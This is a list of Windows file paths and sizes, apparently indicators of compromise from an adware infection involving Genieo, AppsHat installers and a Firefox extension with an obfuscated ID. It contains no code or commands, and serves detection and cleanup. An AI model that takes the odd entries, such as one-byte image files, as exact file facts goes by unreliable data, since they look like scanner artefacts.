C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\72.js (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\911be52d07701495078e83a9206b167f.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\17f548e3cc7f3ff5ea90135d36d5617d.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\9.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\04e8dd99d8507cb819f5842891bb38e1.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\skin.css (909 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\8d67ab46bd5bcae77c6c6b11b5654720.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\22.js (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\301.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\ddf2e4e66be71a3aa501f0f1d81c9768.js (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\ffCoreFilesIndex.txt (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\262.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button5.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\d2eb933c47d0580044f729e920ee557c.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\281.js (489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\183.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\userCode\extension.js (358 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\184.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\182.js (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\253.js (741 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\options.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\panelarrow-up.png (921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\180.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button2.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button3.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\527da7a7cda8dba99ce791702fd18eae.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\cb61f016464902e3e7abde750ef80ba6.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\6e6d2fa3e2de0ad6f80c88dde043160a.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\345.js (611 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button4.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\a5d8eadabd69a1a5fd8936768f25760f.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\browser.xul (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\21.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\195.js (414 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\407fbe3700b14ae5bb1391d614260019.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\220.js (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\13.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\b2e7327e3ac0e48bdfe0f2ee52c9bfcf.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\223.js (829 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\c61ce4124d823fd35688eed80827a81c.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\104.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\177.js (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\872632d4dba5c171e72a42614d2bf42b.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\6f853c3a67c26281e0f08b3f48ebe9f2.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\7b5b2cd1ed885911b763748de0e62fac.js (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\b9f5ee3c3d06e3f31441702c458c077e.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\5f811dd3d0ee0431837525a50e825c15.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\14.js (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins.json (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\f4df6139b485e8441ead85439d9b0e50.js (964 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\16.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\adef4cf34f09c97ddf05ee0f7b152b30.js (947 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\defaults\preferences\prefs.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\9774056cfe57a06b996430a878d9f2bd.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\200.js (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\f183a1c9337b10ab3663860e202a82b3.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\207.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\97f2d9400f4f41e0a004435861570a3b.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\102.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\0cb63f7cf6b8159c4f9788d9ed18275e.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\2b28a69712a27f77ea83be613b1b130b.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\246.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\242.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\651148047984925c52db469330db90bf.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\91.js (6772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\popup.html (353 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\icon16.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\96535ae26022e95205336b6fd0dfa30b.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\40fbad884e8b31bac377f4b3b4234a30.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\6acae8acaae3dc3de618c70dcea92ac0.js (618 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\252.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\64.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\4.js (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\manifest.xml (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\78.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\47.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\c262c0e9c94427dc9ed88ee28c1a65df.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\options.xul (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\28.js (540 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\update.css (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\locale\en-US\translations.dtd (429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\589ae49080bbcf5ef005df42c5431597.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\c11ef8a5aa8ffdad3fc716ad6936ea56.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\98.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\search_dialog.xul (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome.manifest (634 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\7.js (689 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\background.html (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\ebfd80fa6c60ea67c1d52c5d9ab644bf.js (357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\c0199a124990378c5a0d61a8fe029843.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\userCode\background.js (640 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\4d651c7925db39b85b6a733479754503.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\dialog.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\03afa64119f70e1aebbe898c1b5da437.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\icon128.png (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\installer.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\icon48.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\bf8b21d3242abeb0ac0b4bad994e9dad.js (651 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\17.js (2473 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P5Y5B9WWJJJ5HVQUNP5Q.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KAWX3NZ41ZYMD0YSFS9E.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49RJHLBJDH30A4KJTGPP.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaF4DB.tmp (10027 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\appshat.exe (13188 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\webplayer_installer.exe (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\gentray.log (7783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.gif (840 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\2_collecting.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\text (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\collapse.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\complete.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA79.tmp\fct.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA79.tmp\KillProcDLL.dll (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\img\tray (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.png (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\2_collecting.png (15 bytes)
